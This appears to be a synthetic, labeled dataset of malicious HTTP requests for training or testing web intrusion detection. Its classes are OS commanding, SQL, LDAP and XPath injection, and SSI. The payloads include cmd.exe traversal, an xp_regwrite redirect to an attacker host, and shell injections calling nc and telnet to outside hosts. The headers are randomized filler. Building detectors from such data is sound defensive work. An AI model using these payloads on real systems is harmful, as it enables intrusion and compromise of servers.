Via: 0.1 www.rgji.css:924, FTP/4.1 www.schzerE5.tiff, 0.1 173.19.124.43
Transfer-Encoding: 8naiia
Upgrade: isseep/7.6
Warning: 667 152.172.13.95 "aRhru0iesewyecft" "Tue, 02 Mar 10 13:29:57 CET"
X-Forwarded-For: 143.248.62.11
X-Serial-Number: 2131870805423
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41236
Start - Id: 44341
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.AolyHtlclA.uk
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 195.143.138.197
Cookie: eoencoxteaYre=douj;7ciso9onq73tno=90783647
Cookie2: $Version="89"
Date: Tue, 26 Dec 06 04:10:57 UTC
ETag: "kwXTvO@4m-@MIi_"
Expect: efnma=td1kxa;tnRq3e7=saxafa
From: Q0IEeur@zgehtbi59.uk
If-Modified-Since: Thu, 12 Jul 07 17:27:36 CET
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: "0Ed436M-Rj3k1HF1-n"
If-None-Match: *
If-Range: Fri, 09 Mar 07 22:55:02 UTC
Max-Forwards: 9779
MIME-Version: 5.3
Pragma: Eiilnn='tisHs'
Proxy-Authorization: Digest nc=e078eCD8
Authorization: a9cb rpta8oc=nteya
Range: -4,7986-,046-946045
Referer: http://www.2dso.st/sewza.jpg
TE: gzip
Trailer: Max-Forwards
User-Agent: eCxBz8Y http://www.Te2ie.fr
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: FTP/3.5 www.nzode.gif, FTP/8.8 6.128.212.140:7478
Transfer-Encoding: deflate
Upgrade: ecbon/5.1, 0dstft/4.6, rh6g/9.8
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44341
Start - Id: 41021
class: SqlInjection
GET /Eosaifh6inngi3nt9a3d/qN1eaD/d4edi/afsn9i2ynaleaAueeah2/ttteislbtceyE/eiu/7E5Ra8adminqUD/2xv0zQXAQKUSnXkT_J2Z/0z2CR-.mspx?.Hio45cU=exec+xp_regwrite+++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27tm%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.1
Host: www.itsnt6I.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=88
Client-ip: 109.121.222.214
Cookie: wz0iefo9yuy=6nCsy
Date: Mon, 24 Mar 08 23:06:12 CET
From: nr8inpt@ayntTOpcTs.it
If-Modified-Since: Fri, 20 Feb 09 11:58:44 CET
If-Unmodified-Since: Tue, 14 Dec 04 02:43:23 GMT
If-Match: "xDdeGdPCY0X-Ouk4"
If-None-Match: *
Max-Forwards: 2
MIME-Version: 5.4
Proxy-Authorization: Basic Ymxld3Vobm46ZWV0dGU=
Authorization: Digest username="n6eIC"
Range: 770-,-93926
Referer: http://odeNgnge.ch/rurtDwni/cfae5.pdf
TE: trailers,trailers,gzip;q=0.9
User-Agent: Mozilla/2.0 (compatible; Konqueror/5.2; Win 9x; weinee)
Via: g4o/1.6 43.248.109.60
Transfer-Encoding: compress
Upgrade: izM/5.7, 1eiDbt/4.4
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41021
Start - Id: 35913
class: XPathInjection
POST /t0skvMYosx/uIrW7LUKUGNQZtqmov/YHU-Ppsall8zo.png? HTTP/1.0
Content-Length: 243
Content-Language: on,towsk,a3een
Content-Encoding: gzip
Content-Location: http://1renesp.uk/p4hroibe/ssDal/fean8/hsotds/dnrsncun.ace
Content-MD5: U3N6SXpTem9pSG51cmxvMA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Aug 09 24:09:57 UTC
Last-Modified: Sun, 26 Aug 07 14:18:35 CET
Host: 137.222.100.116
Connection: foxrvasd
Accept: */*
Accept-Charset: macintosh;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 41.49.252.78
Cookie: datig=1iekiho' or    1<     kutho9/c/nulro/child::text()[position()=681]  or 'arul'    =    '
Cookie2: $Version="5"
Date: Thu, 30 Jun 05 04:48:04 CET
ETag: W/"mYru_vrQXRGMGK7Twc.@"
Expect: 100-continue
From: 5ixneda@rqhrvad.be
If-Modified-Since: Thu, 15 Dec 05 10:23:47 GMT
If-Unmodified-Since: Tue, 04 Oct 05 22:23:20 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Jul 04 18:56:11 CET
Max-Forwards: 4
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: a6ocet tbqE20r=l91ubeei
Authorization: NTLM bnJ0ZGVhZWFlcDFUZWZsZHNuanJhcnlpa21kbXBic29lcm9UZTFkNmNvbg==
Referer: /uhj7nse/8hqstIeE/aarobhaU.asp
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.1 (compatible; Konqueror/1.8; Solaris; mtuEtPo; mrrhor)
UA-CPU: 68000
UA-OS: Solaris
Via: 7.2 www.fNeetIe.js
Transfer-Encoding: ejfb
Upgrade: tbtme/2.8, fjtey/4.5, tmigc/3.0, nBens/3.5
X-Serial-Number: 8640884684132119709
----: ----------------------------

9tadiznnIokofua=eth&thne=cnua7mvacceptmH&tye=iOqUXO0&Sp35D=e1pnfexemth&itmn0io=35pasadlinkev3Cusaw&rRar3Uer=942173&fsrores780=Dn&u_YZbF@cPY@@=tao&unaammtu=qN&oWee=vbscriptwshnntnsedsr&tnt=eT1@Wd-O_ZG&1hitrogsa=mENdrntax3drtsuN&getoxOe=dWqJrq

End - Id: 35913
Start - Id: 36458
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: www.thiqr.org
Connection: lg5a
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 9.139.53.150
Cookie: teih7pNtwkvq=dJqaX_Kh;rtmrIDb1agittx=3264664;qn=rRW;dnad=n1eTe;oRLEsl9ewluren=1978958
Cookie2: $Version="27"
Date: Sat, 12 Apr 08 16:36:26 GMT
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: amnm6
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Mon, 08 Mar 10 04:09:38 GMT
If-Match: *
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: "C2iD83XH4OAhphnS@_PV"
Max-Forwards: 599
MIME-Version: 8.0
Pragma: remiah2t=ninyos
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM ZTJzdHl5QWVvbXM1c3UxZTRhZXJwbzVkMGMwZXh1ZXJhbGU=
Range: 57-,410056-,436232-1281
Referer: http://Rdoj.gov/6iiT/emrrszj6.exe
TE: deflate,trailers,chunked;q=0.8
Trailer: Referer
User-Agent: ItbdN (iOe1t7x; f3PYNQr; axDI.Sa; lEJjSe; e146_0aplZ)
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 428x8640
Via: 6.4 252.205.186.162
Transfer-Encoding: deflate
Upgrade: fet/9.1, iro/2.9
Warning: 940 176.201.209.211 "dndrrAtk" "Mon, 05 Jan 04 22:49:43 CET"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36458
Start - Id: 39469
class: SSI
GET /pJIei8hzdE3otpN0PSL/ietdhjF2ur.htm?oOtslatv=%3C%21--%23email+fromhost%3D%22www.sndwst.com%22+tohost%3D%22mailbox.lEs7.com%22+message%3D%22tihsN+nwtsnt+Alutl+Elfa0%22+fromaddress%3D%22lkksnr.com%22+toaddress%3D%22emeT.oA.com%22+subject%3D%22c%22+sender%3D%22sJt.com%22+replyto%3D%22ocresp.com%22+cc%3D%22a4%22+inreplyto%3D%227t+tOn+9eal%22+id%3D%22Tlmail%22+--%3E HTTP/1.1
Host: 23.59.220.208:2356
Connection: close
Accept: audio/*, text/plain;q=0.6
Accept-Charset: iso-8859-5;q=0.3, koi8-r, iso-8859-4, cp-950;q=0.1, x-mac-icelandic;q=0.5
Accept-Encoding: *
Accept-Language: *
Cookie2: $Version="6"
Date: Tue, 20 Sep 05 24:34:11 GMT
If-None-Match: *
Proxy-Authorization: oHcn mteD=tlrPh
Referer: /ossanw/dqrbf/wgfvwDt.css
User-Agent: sdnswioiaw/2.9.4.6.1
Via: 7.7 18.100.160.144, 5.3 www.uotcphe.htm

null

End - Id: 39469
Start - Id: 36738
class: OsCommanding
GET /fNeosapsuo/y4IfabegdCh/ehrtk/eBk3UsYsdRNGffffLGte/dd0trmtoitsruemtmtE/9G9PTGAXCjT.pl?6oi=hn&iYoqsooj5=s3SI-yC&Sdemnaehtntl=e6hnoyaaorb9eecs&yAiIM8htytap2iT=1f%25u%7C&resyAtrrnee=i.p&lam=stdinrnT&wI8N=m5AxwxNzh&an1e4s=9883439002&so3jltdntEoaoe=ge&llbgxO3aCo2f=%5C%22++%5C%3B+%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++www.latratmeasng.com+++86%5C%3B HTTP/1.1
Host: www.ZLeo8mt3o.st
Connection: tocbw
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew;q=0.3, shift_jis, x-mac-icelandic;q=0.9, iso-8859-8-i;q=0.7, iso-2022-jp
Accept-Encoding: gzip, compress, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 71.77.69.175
Cookie: Ettra=5;hNsWLxtlrs6h=8;nAaeekcme0eu=7597;csasnsai=6ajtmrzwmtoaqyYyyh;JGy-5obetween=BYc
Cookie2: $Version="79"
Date: Mon, 01 Aug 05 03:27:57 GMT
ETag: W/"KQH1Ph8SYsJZUWFBCG"
Expect: 100-continue
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 31 Oct 08 19:34:17 GMT
If-Unmodified-Since: Tue, 25 Jul 06 03:08:30 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Dec 09 06:09:09 GMT
Max-Forwards: 37
MIME-Version: 3.9
Pragma: ipi='n8a1Z'
Proxy-Authorization: Digest algorithm=Rrf1lpt
Authorization: Basic b3J0c3Q2aDpqY3NlbUx0eQ==
Range: -47510,582-0
Referer: http://www.leaiao.fr/boli/Ifyhay.mpg
TE: trailers,trailers,deflate
Trailer: From
User-Agent: 6rofengeer6au
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 402x4966
Via: uwoe/8.8 227.139.112.151
Transfer-Encoding: identity
Upgrade: rss8so/4.4, hNo/7.8, dfee/8.1
Warning: 867 151.26.59.212 "etraSdoEtTi83ctsms0" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36738
Start - Id: 42328
class: SqlInjection
GET /le5aw/Hurataeh7/bpasswdN/bnhJQ1cUHK3l/era3tixhanhreah/06P-Fi..mdb?CpassthruqtPH=jofoxoA4Mariso&iih=scN7FseOnu&7waditWtiodi=zqdHZ91G6VH&ilo9i=adXP6ritans&u4Peebt4wdiEmhs=trthtpassefx&tritA3Lao7r=%27+++++UNION++++++++++ALL++++++++++SELECT+++soGnzt+FROM+zomeDnraiE+++++WHERE++%27%27++++%3D+++%27 HTTP/1.0
Host: 50.123.216.77
Connection: keep-alive
Accept: application/x-tar;q=0.3, image/png;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: o5ooa5d-otleter4;q=0.9, dmo3i8rx-SvA1e, tuirphn-ar;q=0.9, a-ea6gurme, f1-TaEoe
Cache-Control: min-fresh=5321
Client-ip: 64.206.153.107
Cookie: qr8UjtttTsaj=jm1;9idgohevc=?r7alk;rsshoo=|msnsamsDt;M3VZyBGF=rr;y6oieroele=10;hennoedbrm=irtopenhoneo s0
Cookie2: $Version="8"
Date: Thu, 03 Feb 05 04:02:30 CET
ETag: "_05h89GLjeFPIMmU"
Expect: 100-continue
From: vtsibh@nsti.biz
If-Modified-Since: Sat, 19 Dec 09 02:46:38 CET
If-Unmodified-Since: Mon, 12 Jul 04 23:51:17 CET
If-Match: "b570d2JRlzPth825x"
If-None-Match: *
If-Range: *
Max-Forwards: 00
MIME-Version: 1.1
Pragma: syeoh='eooft'
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: uoEnqe 1brd=avihTo
Range: -416,3-,-523324
Referer: /eeels/ndbc/iie9/Seaws/mtoo.mpg
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: a5puvil6it/7.1.5
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: 3.7 85.43.220.45:4691, 7.2 www.z4nr.jpeg, 9.0 183.175.36.77
Transfer-Encoding: ipvwE
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 47.158.122.16
X-Serial-Number: 807714416153290560
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42328
Start - Id: 37148
class: LdapInjection
GET /nbnYKF@-OWYq_qJc0/orLnbiT/eN/xtdinysah.mspx?Otufysehmt=+o+5ne&1iond54rNp=52945&TctareoesfcaUuh=aEhaosuabui8&sosia=no0%29%28+%7C+++%28yeean%3D*%29&o6a=l+tTrperlhE2Hd&lw8ml=lib%3C HTTP/1.0
Host: 137.166.38.226
Connection: Nwymn7o
Accept: image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ae-27ftOena;q=0.7, tzu-t
Cache-Control: An=I
Client-ip: 186.207.13.158
Cookie: TPjZ=2
Cookie2: $Version="12"
Date: Mon, 08 Jun 09 24:45:32 UTC
ETag: W/"RxU5d45Z4IV2969"
Expect: 100-continue
From: tiriuma2@nheraeb.net
If-Modified-Since: Wed, 12 May 04 16:36:10 UTC
If-Unmodified-Since: Thu, 19 Feb 09 12:58:52 UTC
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: *
If-Range: Wed, 13 Jun 07 10:00:49 GMT
Max-Forwards: 993
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: NTLM aGFldGVpYTBsdG5haHN0Y2ZpelJkZE1zYWh3bmhpZGN1bHQ=
Range: 88347-,9-
Referer: /lNteoony/eewa.php
TE: trailers
Trailer: Accept-Language
User-Agent: ch7hmri1etiltf3nZeei
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: sKaiF/3.8 201.116.20.242:5448, 1.1 www.nePiecb.shtml
Transfer-Encoding: identity
Upgrade: rn2ata/5.1
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 46.83.73.112
X-Serial-Number: 4738976742686812
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37148
Start - Id: 39199
class: SSI
PUT /ABwindow.openEselectD0AX/oauhr/jJ6-wDUa.TTu/OdgmcyO6e0reiz/SUgroup by/tr1Xhr/o8S/reTpuaio/ueactro.html? HTTP/1.0
Content-Length: 181
Content-Language: dnon,i9,ttnvouo
Content-Encoding: compress
Content-Location: /MfsaIal/uptsu/jeoi/n5hesEtw/P5daehy.php
Content-MD5: NjV0dG9lZWRubnRUbnVFcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Mar 10 03:23:05 GMT
Last-Modified: Sun, 29 Oct 06 24:01:12 UTC
Host: 252.103.233.194
Connection: bsntepV
Accept: */*
Accept-Charset: iso-2022-jp, windows-1253;q=0.2
Accept-Encoding: 
Accept-Language: wrrr-l6asrtrn;q=0.4
Cache-Control: no-cache
Client-ip: 215.91.4.112
Cookie: wodTt1saomh=85;l34o3md9=5;nOisvees=634878800;remd2uev=2porcdbie1qE;rs=040
Cookie2: $Version="690"
Date: Wed, 23 May 07 13:53:32 CET
ETag: W/"_bPK-Nwbl2.qlgL"
Expect: 100-continue
From: 6ikA@Trnnt5erl.uk
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Mon, 05 Feb 07 01:10:42 GMT
If-Match: "xErGwVasf6Rn96b"
If-None-Match: "buUy7ulYGta65KvPnS5"
If-Range: "nIPxMLXiobi6t._wG"
Max-Forwards: 412
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: Basic b0Z3aHM6dHJmZGduc2U=
Range: -6444
Referer: http://Rglu.biz/be3hdanc.tiff
TE: chunked;q=0.9
Trailer: Proxy-Authorization
User-Agent: nEson/5.8
UA-Disp: 375,7789,32
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: deflate
Upgrade: rsq/5.8, einc/6.2, tohA/8.2, cdtd6/5.7
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

autoexeclsupJgi7pMwS=eeTyCUT57-&50aeOtFdelep=479707&v7f4CH=aheEhwwez6in5&fromJxRxRjpThopt=e &OsnetcatrkVL=3s-hbpJlsat&ashcaowceacdr=<!--#echo var="date_gmt"-->&zst=560

End - Id: 39199
Start - Id: 35265
class: SqlInjection
GET /dt8NoNm@QnYK7N9c/SK7Fexeck2Xscripty1passwd.cJ/zX9Egxvl/Ikjsad/XlSO/lqmkfKsLdcp2l11/psM.png?el=%27++or+++id+++in+%28+select+++*++from++++++++user_db+++++%29&saretgbya=5562&rd=d60Jigeay&eaf6W=waU%3Ee+qSo2s3k%26loyr%7Clog&bgntv=systemall3a-essmy2 HTTP/1.0
Host: 90.60.104.23
Connection: close
Accept: audio/*;q=0.9, application/postscript;q=0.0, image/jpeg
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=4
Client-ip: 109.198.163.157
Cookie: uVzC6mDx=886427023;airsi2ancHonn=1613183
Cookie2: $Version="06"
Date: Mon, 07 Jun 04 20:01:11 CET
ETag: "bvEbhRuWJy1AnSCQb"
Expect: meahwq=liroah;ooftt
From: lpter@0feo.uk
If-Modified-Since: Mon, 10 Mar 08 20:04:24 GMT
If-Unmodified-Since: Tue, 29 Mar 05 22:05:15 GMT
If-Match: "49Y2aJQkLsrclT-vssYb"
If-None-Match: "1yrJVAEuoc6NI.AOn"
If-Range: "m9sFjx2KK14Y7kvz@wzX"
Max-Forwards: 1120
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: Stnre narm7va=xa1tc
Range: 930-456,2355-
Referer: /iartoi.pl
TE: trailers
Trailer: Referer
User-Agent: Mozilla/4.2 (compatible; MSIE 3.9; Windows NT; w9l3frcy; ga26seecnl; rruOnia2hu)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/4.0 www.E1jxety.gif, 1.4 192.73.193.117
Transfer-Encoding: compress
Upgrade: sJi/7.6, enhin/3.8, 4oba/9.2
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 086505531477
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35265
Start - Id: 38179
class: LdapInjection
GET /y5/ebS4SVrTCA/eIfNylZwUYm8RNs/kdMsoebdbeyseun/tGSugUmhCBQj.2O1czmp.htm?2danQ0wd=%29+++%28%7C%28cn%3D*o++++%27brien*++++%29%28mail+++%3D*o++%27brien*++%29+++&enuo=8561 HTTP/1.1
Host: 187.162.57.47
Connection: close
Accept: image/*;q=0.9, image/png, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: cdeh-2;q=0.1, rnVmn-yfd;q=0.1, eottee-sBtd;q=0.7
Cache-Control: no-store
Client-ip: 238.249.58.159
Cookie: Iuvbaewn=/ton62ecfonege];jp4.d=oev8X;gnhnlvmnRdonea=i?xterm
Cookie2: $Version="819"
Date: Wed, 17 Oct 07 07:08:59 CET
ETag: W/"cvMbx4sfux4.USQJj"
Expect: 100-continue
From: 5n7e@llnrwde3K.st
If-Modified-Since: Sun, 12 Dec 04 08:40:40 GMT
If-Unmodified-Since: Sat, 10 Dec 05 15:27:05 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Feb 08 02:44:20 UTC
Max-Forwards: 79
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic dGlvbDp6c2xibmU=
Authorization: Basic dHNzMmRxZzpuZHJyZWw=
Range: -58269,-622
Referer: http://www.tt1y.be/a8oalsi/ttNigk/uiyttd/8horqtt/eteti.cfm
TE: trailers,chunked
Trailer: Via
User-Agent: mxnftn3xaiI
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: 3.2 www.aRput.tiff
Transfer-Encoding: gzip
Upgrade: nume/0.6, Uma/7.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38179
Start - Id: 43486
class: OsCommanding
GET /zerr7ccI/0it/G1sFqLlwV6Sj9Hx/errr8/aruXlmooc/4.1i/pevRTersSElurguvb.js?pd7sm=e&8LWcy=%7C+++++%2Fusr%2Fbin%2Fnc++++-vvv++++155.30.192.48++++80%2500&cUnegoiahf0p=a9yinrti&rc=hvE&ddlszydhoceartc=obin&tzR=osandth1iv5u+eatY+t&z5brpku7ptue=exKkcUU&rh=5&Nere=kDejOH&4ceecorptI5neme=steldisDineelgH HTTP/1.0
Host: 59.113.92.22:2524
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 52.237.38.162
Cookie: tehcortl68gltm=ewkuier;nuouplCneynnet= en-iy2kuehS;reesadoav1oozae=rodqeeilcnreeetyr;nnndmeEa8ihern=dOx;reh=aiesroaEgimeprse
Cookie2: $Version="51"
Date: Tue, 15 Feb 05 22:11:18 GMT
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Mon, 30 Apr 07 24:00:07 GMT
If-Unmodified-Since: Thu, 05 Mar 09 17:52:26 GMT
If-Match: "XrFg0cK19tPtMBrhHyi"
If-None-Match: *
If-Range: *
Max-Forwards: 7468
MIME-Version: 0.6
Pragma: sttaot=aia
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: iietdn hkdhon=yK8e
Range: 4-
Referer: /dnre2ec/e9ro.bin
TE: gzip,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: a3mme3sL (r@BEecV6aF)
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: 9.0 www.ucei.jpeg
Transfer-Encoding: deflate
Upgrade: whvq9/8.8, onR/9.0, ohe/5.4
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43486
Start - Id: 42379
class: SqlInjection
GET /aCfmRx7wph-@obOs/iqaGTF7ehyX05ovY0/tNAuYAooQ57r0OSm.shtml?ehylNroR=8781723&WorXFb1nI=4&yHrceaWnomtnOe=siadt3utreeefct2R&erh=tth&eek1rrcsAtybqti=87231000&9smrn=erutn%3C&sIA9tg=7383282&ek13v=gystivuP%7Cc&zrl6idra=and+++++0%3C%3E%28select+count%28*%29+from++++lr+where++++tme%3C%3E%29&dmuhejsmsrdn=oNP&glcTj=edtsstyleeoAsfew+&ILw.Cm22t=oid+rnlm7stwH+&lAooihHhn=ro1 HTTP/1.1
Host: 215.164.126.82
Connection: s6hpfxks
Accept: text/html, audio/basic;q=0.6, audio/basic;q=0.3
Accept-Charset: windows-1258
Accept-Encoding: 
Accept-Language: oC-nah;q=0.2, j8e6i-nenjh, eho-eir;q=0.5
Cache-Control: only-if-cached
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="8"
Date: Tue, 18 Nov 08 04:23:04 GMT
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: Ee02n=ittst6sO;hlInLqdo=cld7
If-Modified-Since: Sun, 18 Dec 05 03:49:48 GMT
If-Unmodified-Since: Sun, 07 Aug 05 07:54:23 GMT
If-Match: *
If-None-Match: *
If-Range: "iy7ShGIHE6lGl6h3s0DX"
Max-Forwards: 916
MIME-Version: 9.3
Authorization: oeifa renlcmT=aansato
Referer: /lis8mpp/dbaeTo/uSn320.jpeg
TE: deflate;q=0.1,trailers,trailers
Trailer: Cache-Control
User-Agent: aSAjVnU http://www.iihnwl.uk
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: HTTP/2.0 www.nwTt5Um.jpeg, 0.7 www.1tiIoj6A.css, 7.0 www.oiqi19.css
Upgrade: TyteS/4.7, iaa/1.6, irg/7.1, 8lsno/4.8, era/0.2
Warning: 574 57.17.46.185 "veun9pelul" 

null

End - Id: 42379
Start - Id: 39040
class: LdapInjection
POST /aU-tvKu@3ZxlcjvtiVPJ/ItK9htpassfX1pwinntYd5.html? HTTP/1.0
Content-Length: 161
Content-Language: 5pervi
Content-Encoding: gzip
Content-Location: http://www.kt7ee.be/dtae/nhi0c/fgi80tu/8dr1eoaa/oniteh.php
Content-MD5: Zm1zcmFldW9Tbm1lZmFnZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Jan 08 02:37:50 UTC
Last-Modified: Sat, 03 Jun 06 06:09:24 GMT
Host: 223.212.175.155
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: hhhJsu-t, s2I9xd-dsY, 5h12l1On-e;q=0.2, Ay-ttete;q=0.2, til-xogAR;q=0.8
Cache-Control: max-age=0103
Client-ip: 98.197.175.244
Cookie: estg=3;3oodhlNr=nep;aceeesacsoaeg=ver3ooeol|i;iieg4ssa=wfe7rqrp
Cookie2: $Version="6"
Date: Mon, 03 Nov 08 12:32:49 CET
ETag: "qrE-ovJp0PolKoL1u4cC"
Expect: 100-continue
From: n1eboh@st19rPen.org
If-Modified-Since: Sun, 05 Aug 07 21:08:21 CET
If-Unmodified-Since: Fri, 03 Feb 06 10:36:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 755
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ohSun.cz/jfd5ocqe/z1nbbi1/pdriaah.zip
Authorization: NTLM bG5obGlpMWVhdWVMa3lOa2FpeGRpemRNazhzZnVoZHF5dA==
Range: -4
Referer: http://www.ohsdjsh.de/c0nnj/aorre.php4
TE: gzip;q=0.9,chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: te7Mnmiet (kWgSXy99; iv.7AX.)
UA-CPU: MIPS
UA-Disp: 720,158,16
UA-Color: color32
UA-Pixels: 183x5946
Via: 1.2 126.185.244.142
Transfer-Encoding: Fpee
Warning: 184 201.174.35.89:741 "pn1en0ohpElcexnsIrn" "Tue, 06 Jun 06 13:35:25 GMT"
X-Forwarded-For: 157.105.101.82
X-Serial-Number: 8237003148832
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

echoNUhFexecKdMkkO=aefte|3t rYxv&ebotsImbe=00242017&3pl=0705181&sdEkdgPni=23&9s5tnnvgete=5926081&J75eviOHV-=tlhr@&dmz=5295268&k2tho=e~lbi)f%ukhn%g<

End - Id: 39040
Start - Id: 35217
class: SqlInjection
